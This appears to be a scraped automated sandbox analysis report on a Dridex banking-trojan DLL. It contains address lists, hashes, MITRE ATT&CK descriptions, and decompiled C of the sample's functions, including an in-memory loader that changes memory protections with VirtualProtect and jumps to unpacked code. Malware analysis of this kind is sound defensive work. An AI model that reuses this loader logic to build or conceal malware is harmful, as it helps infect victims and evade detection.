0x6ed01bb9
0x00000000
0x6ed01bb9
0x6ed01b2f
0x6ed01b3f
0x6ed01b3f
0x6ed01b41
0x00000000
0x00000000
0x6ed01b37
0x6ed01b39
0x6ed01b39
0x00000000
0x6ed01b3f
0x6ed01aef
0x6ed01af7
0x6ed01b17
0x6ed01af9
0x6ed01af9
0x6ed01b01
0x6ed01b0a
0x6ed01b0a
0x6ed01b01
0x00000000
0x6ed01af7
0x6ed01a68
0x6ed01a6f
0x00000000
0x00000000
0x6ed01a7c
0x6ed01a82
0x6ed01a87
0x6ed01a8e
0x6ed01a92
0x6ed01aa7
0x6ed01aa9
0x6ed01aab
0x6ed01ab1
0x6ed01abf
0x6ed01abf
0x6ed01ac5
0x00000000
0x6ed01ac5
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed01a0f
0x6ed01a0f
0x6ed01a0f
0x6ed01a10
0x6ed01a13
0x6ed01a17
0x00000000
0x6ed01a2d
0x6ed01a30
0x6ed01a33
0x6ed01a3c
0x6ed01a3f
0x6ed01a40
0x6ed01a42
0x00000000
0x6ed0147d
0x6ed0147f
0x6ed01484
0x6ed0148f
0x6ed0149d
0x6ed014b0
0x6ed014bd
0x6ed014c6
0x6ed014ca
0x6ed014ce
0x6ed01516
0x6ed01516
0x6ed01518
0x6ed0151f
0x00000000
0x00000000
0x6ed01538
0x6ed01540
0x6ed01544
0x6ed01559
0x6ed0155d
0x6ed01561
0x6ed0156a
0x6ed01570
0x6ed01573
0x6ed01577
0x6ed0157f
0x6ed01581
0x6ed01585
0x6ed0158c
0x6ed01595
0x6ed01595
0x6ed01599
0x6ed015ae
0x6ed015c4
0x6ed015d1
0x6ed015d2
0x6ed015d2
0x6ed015d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed0158e
0x6ed0158e
0x6ed0158e
0x6ed0158f
0x6ed01590
0x00000000
0x6ed0158e
0x6ed01553
0x6ed01557
0x00000000
0x00000000
0x00000000
0x6ed015d8
0x6ed015d8
0x6ed015d9
0x6ed015dc
0x6ed015e6
0x6ed015e6
0x6ed015ea
0x6ed015f1
0x6ed0164c
0x6ed01651
0x6ed016a4
0x6ed016a4
0x6ed016a8
0x6ed016ac
0x6ed014d6
0x6ed014d9
0x6ed014de
0x6ed014e4
0x6ed014e7
0x6ed014ee
0x6ed014f2
0x6ed014f9
0x6ed01502
0x6ed01506
0x6ed0150a
0x6ed01510
0x00000000
0x00000000
0x00000000
0x6ed01510
0x6ed016b6
0x6ed016c2
0x6ed016cd
0x6ed016d4
0x6ed016dd
0x6ed016e7
0x6ed016e8
0x6ed016f6
0x6ed016fb
0x6ed016fc
0x6ed01709
0x6ed0170e
0x6ed01720
0x6ed01725
0x6ed0172a
0x6ed0173c
0x6ed0174e
0x6ed01753
0x6ed0175e
0x6ed01765
0x6ed0176a
0x6ed01772
0x6ed0177b
0x6ed0177b
0x6ed01787
0x6ed0178e
0x6ed0179a
0x6ed017a6
0x6ed017b4
0x6ed017c5
0x6ed017cc
0x6ed017d1
0x6ed017da
0x6ed017df
0x6ed017e1
0x6ed017e5
0x6ed017e9
0x6ed017f6
0x6ed01803
0x6ed01807
0x6ed0181b
0x6ed0181f
0x00000000
0x00000000
0x6ed01834
0x6ed01836
0x6ed0183e
0x6ed0183b
0x6ed0183b
0x6ed0183b
0x6ed01842
0x6ed01844
0x6ed0184a
0x6ed01850
0x6ed018ac
0x6ed018b5
0x6ed018b9
0x6ed018c6
0x6ed018cf
0x6ed018d4
0x6ed018d8
0x6ed018db
0x6ed0193c
0x6ed01952
0x6ed0195d
0x6ed0195e
0x6ed0195f
0x6ed01963
0x6ed01966
0x6ed01be6
0x6ed01be9
0x6ed01be9
0x00000000
0x6ed01966
0x6ed018e5
0x6ed018f5
0x6ed018fe
0x6ed01907
0x6ed01910
0x6ed01911
0x6ed01912
0x6ed01917
0x6ed0191f
0x6ed01927
0x00000000
0x00000000
0x00000000
0x6ed01929
0x6ed01859
0x6ed0185e
0x6ed01862
0x6ed01862
0x6ed01866
0x6ed01869
0x00000000
0x00000000
0x6ed0188a
0x6ed0188c
0x6ed01890
0x6ed01892
0x00000000
0x00000000
0x6ed01894
0x6ed0189b
0x6ed018a7
0x00000000
0x6ed018a7
0x6ed0186e
0x00000000
0x6ed0196c
0x6ed0196c
0x6ed0196d
0x6ed0197d
0x6ed01989
0x6ed01992
0x6ed0199b
0x6ed019a4
0x00000000
0x6ed019a4
0x6ed01653
0x6ed01655
0x6ed01657
0x6ed0165c
0x6ed01661
0x6ed01674
0x6ed0168a
0x6ed01693
0x6ed01694
0x6ed01694
0x6ed01696
0x6ed01697
0x6ed0169a
0x6ed0169e
0x00000000
0x6ed01657
0x6ed015f3
0x6ed015fd
0x6ed015fe
0x6ed015fe
0x6ed0160b
0x6ed01617
0x6ed01619
0x6ed0161b
0x6ed0161f
0x6ed0162f
0x6ed0162f
0x6ed01636
0x6ed01639
0x6ed0163a
0x6ed0163e
0x6ed01648
0x00000000
0x6ed01648

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05d1d824c3e02009a39c19fe2be7d8172360735924d7fd4ed359f5bc125d2906
Instruction ID: 8713c60a6c54bd0b52b0c3948bdbb52cd011d05dcc0b29208a30d0517099c867
Opcode Fuzzy Hash: 05d1d824c3e02009a39c19fe2be7d8172360735924d7fd4ed359f5bc125d2906
Instruction Fuzzy Hash: C1328B70108345CFD754DFA4C890A9EBBE4FF95308F188D2DE5958B2A1EB70E94ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 6ECF6D0C, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECF6D0C() {

				 *0x6ed0d280 = GetUserNameW;
				 *0x6ED0D284 = MessageBoxW;
				 *0x6ED0D288 = GetLastError;
				 *0x6ED0D28C = CreateFileA;
				 *0x6ED0D290 = DebugBreak;
				 *0x6ED0D294 = FlushFileBuffers;
				 *0x6ED0D298 = FreeEnvironmentStringsA;
				 *0x6ED0D29C = GetConsoleOutputCP;
				 *0x6ED0D2A0 = GetEnvironmentStrings;
				 *0x6ED0D2A4 = GetLocaleInfoA;
				 *0x6ED0D2A8 = GetStartupInfoA;
				 *0x6ED0D2AC = GetStringTypeA;
				 *0x6ED0D2B0 = HeapValidate;
				 *0x6ED0D2B4 = IsBadReadPtr;
				 *0x6ED0D2B8 = LCMapStringA;
				 *0x6ED0D2BC = LoadLibraryA;
				 *0x6ED0D2C0 = OutputDebugStringA;
				return 0x6ed0d280;
			}

0x6ecf6d1d
0x6ecf6d25
0x6ecf6d28
0x6ecf6d37
0x6ecf6d3a
0x6ecf6d49
0x6ecf6d4c
0x6ecf6d5b
0x6ecf6d5e
0x6ecf6d6d
0x6ecf6d70
0x6ecf6d7f
0x6ecf6d82
0x6ecf6d91
0x6ecf6d94
0x6ecf6da3
0x6ecf6da6
0x6ecf6da9

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46118ac333f2bc2a14c0f8f6e376fe5fefc385e33560fbe3c1378170b2e44cc2
Instruction ID: c58071eb16ac44dd93dbf5915fae1a6a5e3348f1b4dc8dd2895889e04392a761
Opcode Fuzzy Hash: 46118ac333f2bc2a14c0f8f6e376fe5fefc385e33560fbe3c1378170b2e44cc2
Instruction Fuzzy Hash: A411E0B8A15A18CFAB58CF09D190D517BF1FB8E31131AC2AED8098B369D734DA46CF54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6324 Parent PID: 4756 rundll32.exeCOMMON

Executed Functions

Function 007D2092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E007D2092(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				void* _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				signed int _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				int _v156;
				char* _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t140;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t183;
				intOrPtr _t226;
				void* _t233;
				intOrPtr _t236;
				void* _t243;
				intOrPtr* _t247;
				unsigned int _t250;
				intOrPtr _t259;
				DWORD* _t271;
				void* _t275;
				intOrPtr* _t278;
				intOrPtr* _t279;

				_t140 = _a4;
				_v20 = 0;
				_t243 =  *((intOrPtr*)(_t140 + 0x44));
				 *0x7d4418 = 1;
				asm("movaps xmm0, [0x7d3010]");
				asm("movups [0x7d4428], xmm0");
				_v48 = _t140;
				_v52 =  *((intOrPtr*)(_t140 + 0x48));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v188 = _t243;
				_v184 =  *((intOrPtr*)(_v48 + 0x58));
				_v180 = 4;
				_v176 =  &_v20;
				_v60 =  *((intOrPtr*)(_t140 + 0x54));
				_v64 = 4;
				_v68 = _t243;
				_v72 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t271); // executed
				_v76 = _t147;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x58));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E007D1770();
				E007D17BD(_v68,  *((intOrPtr*)(_v48 + 0x28)), _v56);
				E007D1770( *((intOrPtr*)(_v48 + 0x28)), 0, _v56);
				_t155 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t278 = _t275 - 0x8c;
				_t233 = _v68;
				_t259 =  *((intOrPtr*)(_t233 + 0x3c));
				_v96 = _t155;
				_v100 = _v68 + 0x3c;
				_v104 = _t233;
				_v108 = _t259;
				if(_t259 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v120 = _v104;
				if(_v60 != 0) {
					_v124 = 0;
					_v128 = _v120 + 0x18 + ( *(_v120 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v128;
						_t250 =  *(_t174 + 0x24);
						_v140 = _t174;
						_v144 = _t250 >> 0x1f;
						_v148 =  *((intOrPtr*)(_v140 + 8));
						_v188 = _v68 +  *((intOrPtr*)(_v140 + 0xc));
						_v184 = _v148;
						_v180 =  *((intOrPtr*)(0x7d4418 + ((_t250 >> 0x0000001e & 0x00000001) << 4) + (_v144 << 3) + ((_t250 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v20;
						_v152 = _v124;
						_t183 = VirtualProtect(??, ??, ??, ??); // executed
						_t278 = _t278 - 0x10;
						_t226 = _v152 + 1;
						_v156 = _t183;
						_v124 = _t226;
						_v128 = _v140 + 0x28;
						if(_t226 == _v60) {
							goto L8;
						}
					}
				}
				L8:
				 *_t278 = _v68;
				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x24));
				_t159 = DisableThreadLibraryCalls(??);
				_t279 = _t278 - 4;
				_t236 =  *_v100;
				_v136 = _t159;
				_v112 = _t236;
				_v116 = _v68;
				if(_t236 != 0) {
					_v116 = _v68 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t247 = _v48;
				_v44 =  *((intOrPtr*)(_t247 + 0x50));
				_v40 =  *_t247;
				_v36 =  *((intOrPtr*)(_t247 + 0x18));
				_v32 =  *((intOrPtr*)(_t247 + 0x4c));
				_v28 =  *((intOrPtr*)(_t247 + 0x10));
				_v24 = _v132;
				 *_t279 = _t247;
				_v188 = 0;
				_v184 = 0x60;
				_v160 =  &_v44;
				_v164 = 0;
				_v168 = 0x60;
				_v172 =  *((intOrPtr*)(_v116 + 0x28));
				E007D1770();
				if(_v172 != 0) {
					_t279 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x007d209e
0x007d20ac
0x007d20b3
0x007d20b6
0x007d20c0
0x007d20c7
0x007d20d1
0x007d20d7
0x007d20e0
0x007d20e9
0x007d20ec
0x007d20f0
0x007d20f8
0x007d20ff
0x007d2102
0x007d2105
0x007d2108
0x007d210b
0x007d2125
0x007d212b
0x007d212e
0x007d2136
0x007d213a
0x007d213d
0x007d2140
0x007d2143
0x007d2146
0x007d2162
0x007d217f
0x007d21a4
0x007d21a6
0x007d21af
0x007d21b2
0x007d21bc
0x007d21bf
0x007d21c2
0x007d21c5
0x007d21c8
0x007d2216
0x007d2216
0x007d2249
0x007d224c
0x007d225c
0x007d225f
0x007d22a8
0x007d22a8
0x007d22b7
0x007d22bf
0x007d22cd
0x007d22dc
0x007d230d
0x007d2316
0x007d231a
0x007d231e
0x007d2325
0x007d232b
0x007d232d
0x007d2336
0x007d2347
0x007d234d
0x007d2350
0x007d2353
0x00000000
0x00000000
0x007d2359
0x007d22a8
0x007d2264
0x007d2272
0x007d227a
0x007d227d
0x007d227f
0x007d2285
0x007d2291
0x007d2297
0x007d229a
0x007d229d
0x007d21f9
0x007d21f9
0x007d236e
0x007d2374
0x007d2379
0x007d237f
0x007d2385
0x007d238b
0x007d2391
0x007d2394
0x007d2397
0x007d239f
0x007d23a7
0x007d23ad
0x007d23b3
0x007d23b9
0x007d23bf
0x007d23cd
0x007d21da
0x007d21e0
0x007d21e0
0x007d2234

APIs

VirtualProtect.KERNELBASE ref: 007D210B
VirtualProtect.KERNELBASE ref: 007D21A4
VirtualProtect.KERNELBASE ref: 007D232B

Strings

`, xrefs: 007D239F

Memory Dump Source

Source File: 00000004.00000002.325208503.00000000007D0000.00000040.00000001.sdmp, Offset: 007D0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: `
API String ID: 544645111-2679148245
Opcode ID: 154aeed23c22eba6e17dc7f7e95a4f9e493f3c694f17d0c95baea8c6cbc2b798
Instruction ID: 79418c445fcb1e5a8778ff190cc19a96e1e7142fceb7eac2deed598c56b6aeda
Opcode Fuzzy Hash: 154aeed23c22eba6e17dc7f7e95a4f9e493f3c694f17d0c95baea8c6cbc2b798
Instruction Fuzzy Hash: 0FB1B0B5D00218CFCB14CF99C980A9DFBF1BF88314F15816AE958AB352D734A982CF91

Uniqueness

Uniqueness Score: -1.00%

Function 007D1000, Relevance: 1.4, APIs: 1, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 007D10FF

Memory Dump Source

Source File: 00000004.00000002.325208503.00000000007D0000.00000040.00000001.sdmp, Offset: 007D0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction ID: ff45556058301d5b2276856223ec3e3cffbd927860c818233bb487b5d9c04d5c
Opcode Fuzzy Hash: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction Fuzzy Hash: FD4106B5E052099FDB04DFA8C5946AEBBF0FF48314F18852EE448AB340D379A840CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report SecuriteInfo.com.W32.AIDetect.malware1.11362.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Function 6ED00730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Function 6ED02234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 6ED02820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 6ED03138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 00D92092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON

Function 6ED010A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Function 6ED057B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 6ED05B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 00D926AA, Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Function 6ED01166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Function 6ED05BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6ED05BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6ED05BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Function 6ED05BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Function 6ED05C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Function 6ED05E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 6ED05E84, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Function 6ED0564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 6ED01030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 6ED03628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Function 6ECF1494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 6ECFA4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 6ECF8428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Function 6ED09370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 6ED0143C, Relevance: .6, Instructions: 572
COMMONCrypto

Function 6ECF6D0C, Relevance: .0, Instructions: 36
COMMON

Function 007D2092, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 224
memoryCOMMON